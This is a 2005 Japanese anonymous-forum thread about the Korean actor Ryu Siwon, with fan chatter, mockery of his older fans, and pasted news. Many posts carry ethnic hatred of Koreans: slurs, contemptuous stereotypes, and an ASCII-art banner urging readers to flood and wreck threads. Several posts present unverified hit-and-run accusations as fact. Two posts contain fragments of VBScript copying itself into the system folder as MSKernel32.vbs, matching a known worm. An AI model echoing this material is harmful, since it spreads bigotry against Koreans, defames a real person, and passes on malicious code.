ねえ。 シワとりしてるの。 

82 :魅せられた名無しさん:2005/05/27(金) 00:39:36
イベント当たる良い方法教えてください。 

83 :魅せられた名無しさん:2005/05/27(金) 00:41:16
でも 昔 不細工だったかも。


84 :魅せられた名無しさん:2005/05/27(金) 00:44:43
サンウはもっとブーだったなあー。 ビヨンとシンミナのレッドカーペットは
ダブルブー。 シンミナ 顔なおせよ。 女優だろ。 

85 :魅せられた名無しさん:2005/05/27(金) 01:30:50
イベントのこともっとしりたいよ。

86 :魅せられた名無しさん:2005/05/27(金) 01:31:51
ひまわり。さくら。約束。

87 :魅せられた名無しさん:2005/05/27(金) 01:34:33
7月CDでますよ。よろしくね。



88 :魅せられた名無しさん:2005/05/27(金) 02:42:52
>>68=77
笑っちゃいますw 文章がおかしすぎ。一部抜けてるし。
最後の文章も挿入箇所が違う。
あなたは、空港までお迎えに行かれてる工作員さんですか?
アンチ以外の方は異国の方ばっかですか?

89 :魅せられた名無しさん:2005/05/27(金) 06:29:16
>シンミナ 顔なおせよ。 女優だろ。

ああ 嫌だ嫌だ 女優だから=整形 って考え方
心まで整形大国バカ朝鮮に毒されているのかよ。
つか 在日な方なんですか?プギャ
不自然な二重は日本ではキモがられますよ。

90 :魅せられた名無しさん:2005/05/27(金) 07:10:59
(´,_ゝ`)

91 :魅せられた名無しさん:2005/05/27(金) 07:19:27
どブスのばばあに整形しろなんて死んでも言われたくないよな

92 :魅せられた名無しさん:2005/05/27(金) 07:23:50
http://images.google.co.jp/images?q=tbn:28EPo9wo6XgJ:http://www.k-plaza.com/star/img/en_sta_sa020_1.jpg

http://www.togiushi.com/ura/archives/yon/5.jpg

どっちが整形した方がいいかとw

93 :魅せられた名無しさん:2005/05/27(金) 07:59:31
http://images.google.co.jp/images?q=tbn:BJguxNZMY5gJ:http://blog.drecom.jp/bites/img/33/shin_mina.jpg

http://www.vap.co.jp/beautiful/img/cast/minji.jpg

お前らの顔と比べてみろや

ちなみにこれが芸能人の顔ですか
http://images.google.co.jp/images?q=tbn:pr-seXNn3-8J:http://www.wowkorea.jp/upload/news/987/actor.jpg

94 :魅せられた名無しさん:2005/05/27(金) 08:31:59

ひまわり

95 :魅せられた名無しさん:2005/05/27(金) 08:32:45
長崎ハウステンボス

96 :魅せられた名無しさん:2005/05/27(金) 08:34:19
あほシオンオタ


97 :魅せられた名無しさん:2005/05/27(金) 08:35:47
「秘密」やるよ

98 :魅せられた名無しさん:2005/05/27(金) 08:45:40
キムテヒ美人。ジウきれい。キムヒソン美人。 へギョかわいい。     

グンムニョン清楚。 みんなかいいよ。

99 :☆みゅう(*^-^*)☆ ◆P4k8koXlps :2005/05/27(金) 10:10:57

Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)














100 :魅せられた名無しさん:2005/05/27(金) 13:18:10
グンムニョンage

101 :魅せられた名無しさん:2005/05/27(金) 13:20:34
ヨク・パンハage

102 :魅せられた名無しさん:2005/05/27(金) 13:52:02
ヨ・ペンジュン

103 :魅せられた名無しさん:2005/05/27(金) 13:55:27
ビ・イョンホンage

104 :魅せられた名無しさん:2005/05/27(金) 14:03:01
みんなワロタwwww

105 :魅せられた名無しさん:2005/05/27(金) 14:29:03
イ・ポテチン

106 :魅せられた名無しさん:2005/05/27(金) 14:29:44
ゲ・ドロボー

107 :魅せられた名無しさん:2005/05/27(金) 15:33:09
肛門の母ちゃん
http://rerere.sytes.net/up/source/up6195.jpg


108 :魅せられた名無しさん:2005/05/27(金) 15:35:57
昔、秘宝館行ったら、>>107みたいなおばぁちゃんがのぞきショーやってて轢いた...

109 :魅せられた名無しさん:2005/05/27(金) 15:52:48
>>107て見ても大丈夫すか?

110 :魅せられた名無しさん:2005/05/27(金) 21:40:41
今日はセブンで宝まつりだね、。

111 :魅せられた名無しさん:2005/05/28(土) 20:23:44
今日来日してるの?
誰か知らない?

112 :魅せられた名無しさん:2005/05/29(日) 11:52:41
シウォンカコイイ!

113 :魅せられた名無さん:2005/05/29(日) 22:02:40
>>112
ああ、かっこいい、かっこいい。
あの皺くちゃな顔も、音痴なところも、レーサー気取ってるところも、
みんな、みんなかっこいいよ!
これでいい?

114 :魅せられた名無しさん:2005/05/29(日) 22:20:33
>>113
ごくろうさんw

115 :魅せられた名無しさん:2005/05/30(月) 06:08:14
久しぶりにこの板きてみたけど
このスレ伸びてないね。
アンチすらも関心なくなってきたのか・・・。

116 :魅せられた名無しさん:2005/05/30(月) 06:29:07
シウォン、私のまわりの女の子達にも人気高いよ。
優しそうだし育ちも良さそうだし演技も上手いよ。
ファンミでも親切だった。

117 :魅せられた名無さん:2005/05/30(月) 08:12:47
やじうまでハウステンボスの映像が流れたけど、
(しおんというクソガキが花束贈呈)
シウォン、シウォンって馬鹿の一つ覚えみたいに言っててワロタ。

>>116
女性自身の表紙もかっこよかったしね。


118 :魅せられた名無しさん:2005/05/30(月) 08:40:33
>>116
女の子達って何歳ぐらいなの?
育ちがよさそうなところに惹かれるのって
いかにもオバっぽいけど。
私はお坊ちゃんタイプよりワイルドな
ワーキングクラス・ヒーローがいいな。
韓国のスターには見当たりませんね。
そういうコンセプトで売る、という考えが元々ないんでしょうね。

119 :魅せられた名無しさん:2005/05/30(月) 12:05:55
シウォンの人気すごいね!

423 名前:44[sage] 投稿日:2005/05/29(日) 18:56:59
>>44で書いたハウステンボスでバイトしてるもんだけど
今日のシウォンはちょっと凄かった
おばさん達がドワァーーーーーーーと、泣いてるバカもいたw
チェ・ジウの時よりか、確実に客も多かったよ

427 名前:魅せられた名無しさん[] 投稿日:2005/05/29(日) 21:52:38
シオン見た見た 。韓国人客多かったし追っかけもいたみたい

120 :魅せられた名無しさん:2005/05/30(月) 15:00:19
シウォンスレはage進行が基本でつ!

121 :魅せられた名無しさん:2005/05/30(月) 15:48:19
【韓国】中高生の58%が「性暴行は、女性の服装や行動のせい」と回答 [05/29]
http://news18.2ch.net/test/read.cgi/news4plus/1117329191/


122 :魅せられた名無しさん:2005/05/30(月) 20:53:07
アンチ君達も協力して、シウォン君をヨン様より有名にしよう!

123 :魅せられた名無しさん:2005/05/30(月) 20:53:43
シウォン、以前は好きだったけど
なんか間違った方向へ行ってる気がする。
貴公子的なイメージはもうやめてほしい。
はっきりいってダサすぎ。
対象をオバに絞っているからかもしれんが。
優しい、誠実な・・・というイメージも。
スポーツカー乗り回す派手な遊び人、のほうが
当たってる気がする。それはそれで、いいのに。

124 :魅せられた名無しさん:2005/05/30(月) 20:54:00

名前は括弧否

125 :魅せられた名無しさん:2005/05/30(月) 21:19:29
顔と歌と性格はブサイクだけれども...

126 :魅せられた名無しさん:2005/05/30(月) 21:26:30
髪型が変


127 :魅せられた名無しさん:2005/05/30(月) 21:37:35
昭和の人みたい。

128 :魅せられた名無しさん:2005/05/31(火) 02:43:06
シウォンヲタって50〜70代が多いらしいネ。
そんな年代のオバが一生懸命ネットやって見苦しいw

129 :魅せられた名無しさん:2005/05/31(火) 03:21:55
MHPって何?


130 :魅せられた名無しさん:2005/05/31(火) 03:38:58

7世紀にロケット開発? 北朝鮮「世界最初」と主張

【ソウル30日共同】北朝鮮の朝鮮中央通信は30日、朝鮮半島で高句麗期
(紀元前1世紀後半−668年)に「ロケット」兵器が開発されたとし
「朝鮮が世界最初にロケットを製造した」と主張した。
核実験の可能性が指摘される中、北朝鮮の兵器開発の正当性を示唆したも
のと思われる。
同通信によると、高句麗期に製造されたとされるのは噴射推進式の「クァンフィ」。
7世紀の唐との合戦で威力を発揮、高麗期(918−1392年)には「ファ
ジョン」と呼ばれた。
火を付けて発射する方式で「現代式に比べると、単純だが原理は同じ」という。
同通信は「ロケットのすべての属性を備えた世界最初の『ロケット』は
朝鮮民族の知恵と創造、愛国心を示す貴重な歴史遺物である」としている。
共同通信) - 5月30日21時43分更新
http://headlines.yahoo.co.jp/hl?a=20050530-00000277-kyodo-int

もうさ、矢追純一とか国家レベルで追い越しちゃってる。
きっと、こいつらの脳内分泌物質って得体の知れないものがドロ〜って湧き出しちゃっている。
こんなのとコミュニケーションがはかれるわきゃねぇ。
はー、ついにネットの裏社会じゃなくてYahooとかに取り上げられちゃったよ。
すごいよ。もう。ほんと。

131 :魅せられた名無しさん:2005/05/31(火) 03:40:10
7世紀に「ロケット」開発? 北朝鮮、世界最初と主張

北朝鮮の朝鮮中央通信は30日、朝鮮半島で高句麗期
(紀元前1世紀後半−668年)に「ロケット」兵器が開発されたとし
「朝鮮が世界最初にロケットを製造した」と主張した。
核実験の可能性が指摘される中,北朝鮮の兵器開発の正当性を示唆したものと思われる。
同通信によると、高句麗期に製造されたとされるのは噴射推進式の「クァンフィ」。
7世紀の唐との合戦で威力を発揮、高麗期(918−1392年)には「ファジョン」と呼ばれた。
火を付けて発射する方式で「現代式に比べると、単純だが原理は同じ」という。
同通信は「ロケットのすべての属性を備えた世界最初の『ロケット』は、
朝鮮民族の知恵と創造、愛国心を示す貴重な歴史遺物である」としている。(共同)

ttp://www.sankei.co.jp/news/050530/kok086.htm

ロケットの起源は高句麗だったニダ! 誇らしいですね、ホルホルホル

VVVVV|  /VVVVVVVVVVVVVVV
     | ./
     |/    /|
         / |
    ∧ ∧,/ ク ./
    <丶`∀ ァ /
  _/ つ./ ン /
  ~ (  y フ /
   /∪ ィ /
   \/  ./|
    \__/, |
   /// \_|
  ωω

132 :魅せられた名無しさん:2005/05/31(火) 07:11:20
>>128
そんな事ないよ。
私もそうだけど、20台の女の子もいっぱいいるよ。

133 :魅せられた名無しさん:2005/05/31(火) 07:27:10
>>132
( ´,_ゝ`)プッ

134 :魅せられた名無しさん:2005/05/31(火) 10:02:28
重複スレ終了

135 :魅せられた名無しさん:2005/05/31(火) 11:33:24
こっちが先だよ。
それにあっちはアンチスレだし。。。

136 :魅せられた名無しさん:2005/05/31(火) 11:38:37
コイツの何がいいのか、全然わからない
顔ブサだし、ひき逃げだし

137 :魅せられた名無しさん:2005/05/31(火) 16:32:54
ここも安置スレだろ。

138 :魅せられた名無しさん:2005/05/31(火) 18:05:42
ここは釣り堀

139 :魅せられた名無しさん:2005/05/31(火) 18:08:08
しかし、シウォンって、
グッツとかも販売してるし
アクセサリーも、しっかり自分で見につけて宣伝してるし
さすが、商売上手。
マネージメントも一人でしてるから
必然と愛想がよくなるのもわかる
慈善事業じゃないし、それが仕事であるわけだから、悪いわけではないけど
それを、美化しちゃうファンはおめでた過ぎて笑える
疲れてるのに可哀相…とか、私たちの為に頑張っておられる優しい人とか。
理想像を押し付けたい気持ちも解らなくはないし
本人たちが夢の世界に浸ってるのは自由なんだけど
ジャニファンのように若いわけでもない、いい年したおばさんが、
一生懸命媚てるのを見ると…笑えてくる


140 :魅せられた名無しさん:2005/05/31(火) 18:09:53
踊るヨン様
http://www.kancoma.com/cm/047.html

こういうののシウォン版は無いの?

141 :魅せられた名無しさん:2005/05/31(火) 21:22:07
ピと同じく来日してたの?
ピと同じ飛行機で帰国したとか・・・
ピのファンと一緒にいたのに。。。。シウォン・・・貴方に会いたかったのに

142 :魅せられた名無さん:2005/06/01(水) 00:16:46
>>141
これでも見とけ!
http://www.kobunsha.com/CGI/magazine/hyoji.cgi?sw=index&id=001&date=20050517

143 :魅せられた名無しさん:2005/06/01(水) 03:31:39
>>142
おう!この画像、どこかに保存しておいて欲しい。

144 :魅せられた名無さん:2005/06/01(水) 07:41:26
>>25は最新号(サンウ)になってるから、こっちを保存汁。

145 :魅せられた名無しさん:2005/06/01(水) 12:38:21

|| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
|| ○チョソは捏造が三度のキムチよりも好き!!チョソは常にありもしないブームの捏造を続けています!!
|| ○馬鹿チョソスレはウザイと思ったらそのまま放置せずとにかく馬鹿チョソの真実を書きましょう。
|| ○馬鹿チョソネガティブネタは星の数より多いです 馬鹿チョソにとっては都合が悪いのでスレを正常に戻そうとします。
||諦めたらその時点であなたの負け、馬鹿チョソマンセースレがある限り徹底的に荒らしましょう !!
|| ○諦めはチョソの滋養にして栄養であり最も喜ぶことです。チョソに余裕を
||  与えないで下さい。               Λ_Λ
|| ○枯死するまで徹底的に荒らしましょう    \(゚Д゚,,) キホン。
||  ゴミが溜まったら削除が一番です。       ⊂⊂ |
||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
     (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
   〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
     〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
       〜(___ノ  〜(___ノ   〜(___ノ

146 :魅せられた名無しさん:2005/06/01(水) 15:10:12
シウォン、とってもかっこいい。

147 :魅せられた名無しさん:2005/06/01(水) 18:57:42
>>139
全然売れてないからw

148 :魅せられた名無しさん:2005/06/01(水) 18:58:09
>>146
変態好き?


149 :魅せられた名無しさん:2005/06/01(水) 19:42:09
何でシウォンが変態なのよ

150 :魅せられた名無しさん:2005/06/01(水) 20:56:10
ぶっちゃけ
ひき逃げの話ってほんとなの?

151 :魅せられた名無しさん:2005/06/01(水) 20:57:39
嘘です

152 :魅せられた名無しさん:2005/06/01(水) 20:59:05
漏れは親戚の祖母さんの家に行ったときニュースを見ながら
当たり障り無くこれは嘘で本当は〜みたいな話をしてる。
祖母さんは終戦時東京に住んでいたのでこういう話に理解があるのが救い
爺さんの弟は戦後東京で警官だったから三国人をガチで知ってるので
漏れの両親が7年前に韓国旅行に行ったことを話したら
「あんな奴らの国へ行って大丈夫だったの?」と驚いていた。

会社の食堂でもニュース見ながら実はこの話は・・・などと話すと
みんなやっぱりそうだったのか〜と納得してくれる。
まあうちの会社の社長が懲賤塵大嫌いで
朝礼の時に「チャレンジは大好きだがチョウセンは大嫌いだ」
といったブラックユーモアの持ち主だからw

結構漏れの周りは中国・韓国・北朝鮮のDQNぶりで
こちらが捲くし立てずともやんわり諭すと理解してくれるのだが
チョソオタ相手となると大変だ!
チョソオタにこのHPを見せれ

「ビラのHP」
ttp://sapporo.cool.ne.jp/rati_yurusan/

153 :魅せられた名無しさん:2005/06/01(水) 22:29:12
ひき逃げ犯であることも布教しておいてくれ。

154 :魅せられた名無しさん:2005/06/02(木) 01:41:39
断じてKorean Princeでは無い事を信じてくれ!
単にど田舎で戦災を逃れて、昔ながらの堕落した両班生活をして観光で生活をしている本家筋に近いってだけだから。
実際韓国人の8割以上は両班の家柄と主張している。
Korean Princeって名乗れるのは李朝王家の末裔だけ。

155 :魅せられた名無しさん:2005/06/02(木) 10:52:51
確かに 私も30代のおばさんファンだわ。 でも シウォンも32歳なんだからいいでしょ。
主婦って毎日退屈。 シウォンのおかげで楽しいわ。 10代〜20代は恋愛と結婚で忙しくって
芸能人見てる暇なかったの。 今 シウォンワールドのおかげで幸せ。
ひき逃げ ブス好き レーサー気取り 音痴 万年青年俳優 そのへんのお兄さんぽいとこ好きよ。
オフ会で友達たくさんできてたのしいわ。 別に笑ってください。 だってバカッぽいのわかってる。
旦那には内緒だけどね。ストレス解消の良いのよね。悪口OKです。

156 :魅せられた名無しさん:2005/06/02(木) 11:47:14
リュ・シウォンについて長い文章で書かれると
どうしてもコピペと疑ってしまう自分が悲しい。

157 :魅せられた名無しさん:2005/06/02(木) 13:13:31
祝!武道館(2番目ニダ)

 

158 :魅せられた名無しさん:2005/06/02(木) 13:43:33
プッ

159 :魅せられた名無しさん:2005/06/02(木) 13:56:23
主婦のオーランドファン@腐女子

160 :魅せられた名無しさん:2005/06/02(木) 13:56:59
主婦のオーランドファン@腐ババ


161 :魅せられた名無しさん:2005/06/02(木) 15:31:44
かわいそうに。
弟分だと思ってたパクヨンハに、チョン人初の武道館を盗られてしまって。
しかし、はたしてヨンハごときに武道館の席が埋められるのか疑問。

162 :魅せられた名無しさん:2005/06/02(木) 17:05:23
初は、ヨンピルw

163 :魅せられた名無しさん:2005/06/02(木) 18:01:18
822 :魅せられた名無しさん :2005/06/02(木) 17:43:38
シウォンヲタのレス?
弟分なんてちっとも扱ってなかったのに、
今になってよく言うよ。w


164 :魅せられた名無しさん:2005/06/02(木) 18:55:14
>>161
そういうこと言うから嫌われるんだよ


165 :魅せられた名無しさん:2005/06/02(木) 23:24:26
韓国人はすごい。

とにかく、なんと言っても韓国語の悪口の多さには感心します。罵倒すること
への情熱は、世界一ではないでしょうか?あまり他者を批判することを好まな
い日本人には、とても使えないような下品な表現がいっぱいあって、すごく刺
激的だと思います。さすが、他人を批判することに精力を傾けている国民性だ
けあります。道の真中で大声で罵り合っている人たちの、悪口のバラエティ豊
かな表現や、巧みな言い回しを聞いていると、韓国にはめぼしい文学が何もな
いという現実を忘れてしまうほどです。

それに、韓国人のプライドの高さも立派だと思います。たとえ、そのプライド
の裏づけが何も無くても、堂々と「韓国人は世界で最も優れた民族だ」と言い
切れる大胆さが素晴らしいです。発展途上国をけなすことで、自分がえらいと
思えるなんて、すごいじゃないですか。実績がなくても、努力しないで自尊心
を満足させられるのですよ?非常に効率がいいと思います。

また、外国で恥ずかしいことをしたときには、日本人のフリをしてごまかすと
いうやり方も、韓国特有の自尊心の守り方として興味深いと思います。日本人
の私には、なかなかそこまで思い切った行動が取れません。ついつい「うしろ
めたさ」とか「恥ずかしさ」などの不純な感情が起こってしまい、正直に罪を
認めてしまいます。他人のせいにできたらいいのに!と思っていても、勇気が
なくて韓国人のような行動が取れません。

その他にも、常に世界一をめざす向上心が立派だと思います。韓国人は、どん
なくだらないことでも、世界で初めてなら、自信たっぷりに自慢できるんです。
日本人は、引っ込み思案なので、よっぽど優れたことでないと、自慢するのは
恥ずかしいと思ってしまいます。きっと、向上心が足りないんだと思います。

166 :魅せられた名無しさん:2005/06/03(金) 00:12:23
美しき日々のZEROってリュのことだと思ってたんだけど
全く違う人物だったんだね・・・

167 :魅せられた名無しさん:2005/06/03(金) 00:19:29
韓国漁船:
合意文には暴行謝罪と賠償要求も 韓国側発表

 【ソウル堀山明子】日韓が韓国漁船の捜査権をめぐり対立した事件で、韓国の海洋警察庁は2日、
漁船は日本の排他的経済水域(EEZ)を侵犯したが、冷凍器の故障で操業できる状況になかったとの調査結果を発表した。

また、日韓の海上保安当局が交わした合意文には、韓国漁船側がEEZの侵犯を認め担保金を払う一方、
日本の海上保安官の漁船乗組員に対する暴行の謝罪と、漁船の損害賠償2000万ウオン(約213万円)の要求が盛り込まれたことを明らかにした。

 韓国国内では、漁船員が保安官から暴行を受けたとの主張により、違法操業かどうかの判断以上に、「
漁船を守れ」という国民感情が盛り上がっていた。賠償請求は、1日夕、潘基文(バンギムン)外交通商相が
逢沢一郎副外相に妥結案を示した時には含まれていなかったが、その後、加えられた。
http://www.mainichi-msn.co.jp/kokusai/america/news/20050603k0000m030090000c.html

毎日新聞 2005年6月2日 20時49分


おいおい、被害者のフリして逆に賠償要求かよ!
さすがは朝鮮人。
↓船長とやら、解放されたときは元気だったのにw
http://www2.ezbbs.net/24/techside/img/1117722842_1.jpg

168 :魅せられた名無しさん:2005/06/03(金) 04:43:52
あい変わらず肛門に群がるギョウチュウのうなババアがいっぱいだな

169 :魅せられた名無しさん:2005/06/04(土) 04:39:47
サメダムツダイエト

170 :魅せられた名無しさん:2005/06/04(土) 05:48:24
ぅち18だけどまぢ大好きだし★笑顔にやられたょ(*^_^*)

171 :魅せられた名無しさん:2005/06/04(土) 06:21:49
>>170
おいら16歳だけど本当に好きだよ。お嫁さんにして欲しいよ。
いまから韓国語と両班の風習を勉強しておこうかな(^○^)

172 :魅せられた名無しさん:2005/06/04(土) 09:49:52
>>40>>44


こんなに嫌われてても好き?わかんねえ、人殺しファンは。


173 :魅せられた名無しさん:2005/06/04(土) 10:45:01
あたし35歳 本当に好きだよ。 娘10歳 これから 韓国語勉強させて
嫁に行かせたい。 娘も好きだよ。 旦那にたくさんお金稼いでもらって親の
財産もらってお金もちになって娘を嫁にだしたい。シウォンにならひき殺されたい。
韓国でもっともっと嫌われて日本に帰化して欲しい。 どうしてこんなに好きなのか
自分でもわからない。 頭の中シウォンだらけ........

174 :魅せられた名無しさん:2005/06/04(土) 11:11:31
大邱地域の中高校生の2人に1人は、女性のはしたない身なりが性暴行を誘発している
と思っていることが分かった。

29日大邱女性ホットラインによれば、今年4月から約2ヶ月間大邱地域の12の中学・高校
の在校生1500人余りを対象として、性に対する通念など性意識について調査した結果、
58.2%が「女性たちのはしたない身なりと行動が性暴行を誘発する」と回答した。

また生徒の38.2%は「男性の性衝動は本能的なので自制するのは難しい」と答えたほか、
「女が純潔を守ることは当然だ」という回答は64.1%で、男の純潔義務を当然視する意見
52%よりも多かった。

売春については47.5%が「規制すれば性暴行が増加する」と回答し、「男性の性欲を解決
するために必要だ」という回答も16.6%という調査結果だった。

包括的な性暴行被害経験に関しては「淫乱性メッセージや写真、絵を受け取ったことが
ある」という回答が63.5%で一番多かったほか、男女差別的発言や不快な性的冗談を
経験したという回答もそれぞれ49.5%、43.9%となった。

学校で行なわれる性教育については、41.5%が十分ではないと回答し、その問題点と
しては「とても基礎的な内容なので役に立たない」(28.3%)と「専門の教師がいない」(20.7%)
という意見が多かった。

大邱女性ホットライン関係者は「今回の調査で、生徒たちが性暴行発生の時に被害者
すなわち主に女性たちが原因を提供したと見るなど、既存の社会通念に根拠した誤った
性意識を相当部分持っていることが分かった」と正しい性教育の必要性を強調した。

連合ニュース(韓国語)<大邱中高生 58%「はしたない身なりが性暴行誘発」>
http://www.yonhapnews.co.kr/news/20050529/030000000020050529070343K7.html
連合ニュースを犇さんが翻訳<性暴行加害者、職場同僚が最多>
http://www.yonhapnews.co.kr/news/20050515/030000000020050515064618K2.html


175 :魅せられた名無しさん:2005/06/04(土) 11:14:20
窃盗犯は10代が最も多く、強盗は20代、婦女暴行は30代、暴力犯は40代が最も多かった。

月曜日には窃盗事件、火曜日と土曜日には婦女暴行事件、金曜日は強盗事件、土曜日は暴力事件が最も多く発生した。
これは11日、警察庁が発表した「第1四半期治安指標」の内容だ。
今年1月から3月までの犯罪件数は39万3764件と、前年同期より17.2%減った。
5大犯罪(強盗、窃盗、殺人、暴力、婦女暴行)も9万9124件と4.8%減少した。
主な犯罪のほとんどは午前0時から午前4時の間に発生した。
窃盗は深夜よりも、家庭が不在になり、銀行が業務に忙しくしている正午から午後6時の間(24%)に最も多く発生した。
地域別には人口の47.1%を占める7大都市(ソウル、釜山(プサン)、大邱(テグ)、仁川(インチョン)
、蔚山(ウルサン)、大田(テジョン)、光州(クァンジュ))で強盗(53.6%)、暴力(53.4%)、婦女暴行(50.4%)の事件数が多かった。
殺人(44.5%)、窃盗(45.1%)事件はその他の地域に比べ相対的に少なかった。
窃盗と殺人はそれぞれ4.6%、0.8%増加したが、強盗(26.1%)、婦女暴行(6.4%)、暴力(9%)は減少した。
詐欺、横領、背任などの経済犯罪も10〜27.3%減った。
警察庁はこの資料をもとに、人口10万人あたりの年間犯罪件数を推算した結果、殺人1.9、強盗9.7、婦女暴行11.8、窃盗295、暴力511件と、
暴力を除いたすべての犯罪が、米国、フランス、ドイツより少ないことがわかったと明らかにした。

※日本は窃盗を除くすべての犯罪件数が韓国より少なかった。

http://japanese.chosun.com/site/data/html_dir/2005/05/11/20050511000060.html

※日本での犯罪には、当然最近多発する韓国人や中国人の武装強盗も含まれる。

176 :魅せられた名無しさん:2005/06/04(土) 12:25:27
『血の涙』  李朝末期の知識人  李 人稙(1862-1916年)の詩
 両班たちが国を潰した。
 賤民は両班に鞭打たれて、殺される。
 殺されても、殴られても、不平をいえない。
 少しでも値打ちのある物を持っていれば、両班が奪っていく。
 妻が美しくて両班に奪われても、文句を言うのは禁物だ。
 両班の前では、まったく無力な賤民は、自分の財産、妻だけでなく
 生命すらその気ままに委ねられている。
 口ひとつ間違えればぶっ叩かれるか、遠い島へ流される。
 両班の刃にかけられて、生命すら保つことはできない。
    (『韓国現代史』第8巻 新丘文化社 ソウル ) 堕落の2000年史 崔 基鎬より


177 :魅せられた名無しさん:2005/06/04(土) 12:27:00
「朝鮮事情」 シャルル・ダレ 1874年 フランス人宣教師

一般に、政治的活気とか進歩、革命といわれるものは、朝鮮には存在しない。
人民は無視され、彼らのいかなる意見も許されない。 権力を一手に掌握している貴族階級が
人びとに関心を向けるのは、 ただ彼らを抑圧してできるだけ多くの富をしぼり取ろうとするとき
だけである。 貴族たちは、いくつかの派閥に分かれ、互いに執拗な憎悪をぶつけ合っている。
しかし、彼らの党派は、なんら政治的、行政的原理を異にするものでなく、 ただ尊厳だとか、
職務上の影響力のみを言い争っている大儀名分だけのものである。
朝鮮における最近三世紀の期間は、ただ貴族層の血なまぐさい不毛の争いの単調な歴史に
しかすぎなかった。



178 :魅せられた名無しさん:2005/06/04(土) 12:31:36
F・A・マッケンジー
マッケンジーはカナダ人、ロンドン・デーリーミラーの記者として1904年と1906年の2回韓国を訪れている。

「貴族に対する収租地の特許は、民衆にとってもう一つの重荷であった。貴族即ち両班は、
自分たちは勤労階級に依存して生活する権利があると考えていた。高官の子息が成人す
ると、その父は国王に収租地の特許を申請した。この収租地というのは、おそらく、どこか
の川の歩いて渡れる所を通る人たちに多額の賦課をする権利とか、或いはなんらかの特殊
地区内での課税権というようなたぐいのものであったろう。そしてこの収租権者は逆に国家
に対しては実際上何らの奉仕をすることもなかった。……イギリスでの荘園に対する領主
の特権、(とどこが違うのか)」

日本と朝鮮を見比べたアメリカ人ジャーナリスト、ジョージ・ケナンの「簡潔な言葉」に全てが集約されています。

日本から朝鮮に行った旅人がまず驚くことは、 
日本の清潔、秩序、勤勉、繁栄に対して、 
朝鮮の不潔、混乱、怠惰、荒廃との間の著しい差異である。 


179 :魅せられた名無しさん:2005/06/04(土) 12:54:17
>>173
完全に狂ってる。

180 :魅せられた名無しさん:2005/06/04(土) 14:06:31
ここ、シウォンスレじゃ?!

181 :魅せられた名無しさん:2005/06/04(土) 17:23:17
韓タメにシウォンが出ていたね。
カッコよかった。

182 :魅せられた名無しさん:2005/06/04(土) 21:44:11
*

183 :魅せられた名無しさん:2005/06/05(日) 02:10:32
>>173
精神異常者発見。病院に至急、入院しろ!

184 :魅せられた名無しさん:2005/06/05(日) 02:41:45
>>179>>183
コピペにマジレスするなよ・・・

185 :魅せられた名無しさん:2005/06/05(日) 03:00:51
痴呆ヲバだからコピペとか分からないんだよ

186 :魅せられた名無さん:2005/06/05(日) 07:37:01
まあ個人の好みっていうのもあるから一概に言えないけど、
国民の総意はキモっ!だよね。

187 :魅せられた名無しさん:2005/06/05(日) 11:58:50
■ラジオCMに初登場!

6月5日(日)からラジオ日本(1422kHz)で『GiFT』がパーソナリティーを務める『KPR』提供の番組が始まります。
そしてその番組の途中に流れる『KPR』のCMでは、リュ・シウォン本人からのメッセージが聴けます。どうぞお聴き下さい!

『GiFT』 ラジオ日本(1422kHz) 6月5日(日)〜毎週日曜日 21:30〜21:55

※なおこの放送は野球が延長になった場合には次週に順延されます。また放送は関東ローカルとなりますので、あらかじめご了承ください。

188 :魅せられた名無しさん:2005/06/05(日) 11:59:55
■ブルボンCMの提供番組6月のスケジュールです

「めざましテレビ」(フジテレビ系)07:05〜        6月1日(水)
「笑っていいとも」(フジテレビ系) 12:00〜      6月2日(木)・8日(水)・10日(金)
「火曜サスペンス劇場」(日本テレビ系) 21:03〜  6月7日(火)

※「めざましテレビ」は関東ローカルのみの放送となります。

189 :魅せられた名無しさん:2005/06/05(日) 12:00:30
■『チョナン・カン2』出演情報

6月10日(金)深夜放送予定の『チョナン・カン2』(フジテレビ系)に出演します。どんなコメントが聴けるのでしょうか!どうぞお楽しみに!!

『チョナン・カン2』(フジテレビ系) 6月10日(金) 25:35〜25:50

※10日(金)深夜(日付は11日)の放送です。
※なお地域より放送日時が変更する場合もありますのであらかじめご了承下さい。

190 :魅せられた名無しさん:2005/06/06(月) 01:33:48
あげさせてもらうね

191 :魅せられた名無しさん:2005/06/06(月) 12:59:59
白い森、最高!!!

192 :魅せられた名無しさん:2005/06/06(月) 14:04:54
もうすぐ肛門の秘密が日テレで始まるね。
実況出きるひと轢き逃げ布教よろ。

193 :魅せられた名無しさん:2005/06/06(月) 14:08:30
オフィシャルシウォンAA

   __  
  /    ̄ ̄ー―-_
  )           /
  |\|\|\___イ
  | /\  /\ |
  | /・\ /・\ |
  |   ̄/、  ̄ ̄  )
   |    ̄     /
   ヽ  <三>  /
     ヽ    /
      \/


194 :魅せられた名無しさん:2005/06/06(月) 15:03:00
この人ってTUBEの前田と桜金蔵を足して2で割ったような顔してるよね。

195 :魅せられた名無しさん:2005/06/06(月) 19:26:40
文化交流と政治問題(戦後賠償、領土問題)は別ダニよ。
でも韓国有名人、スマトラ救済コンサート、テヒ・イワンスイス訪問では
竹島は韓国領土ダニよ、と言わせるんダニよ。

なんでかの国が文化交流は別ダニよ、というのかと言うと
そうしないと日本人観光客、出稼ぎ朝鮮人シャットアウトになって
ジャパンマネーが入ってこなくなって、また日本に対して優越感がもてなくなるからダニよ。

日本に出稼ぎはOKでも親日派宣言は問題ありダニ。



196 :魅せられた名無しさん:2005/06/09(木) 00:23:55
もうすぐ新曲出るよーん!

197 :魅せられた名無しさん:2005/06/09(木) 11:24:41
日テレの韓流ワクに肛門が出ていた。やっぱりボンボン役。
男の主役も美男ではないが、肛門もスッキリした顔しているけれども相変わらずブサイクです。


ちなみにドラマ・スレはこちら

[イライラ] 秘 密 2 [ムカムカ]
http://tv6.2ch.net/test/read.cgi/tv2/1094432641/

198 :Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1):2005/06/09(木) 11:27:55
c.Copy(dirsystem&"\MSKernel32.vbs")
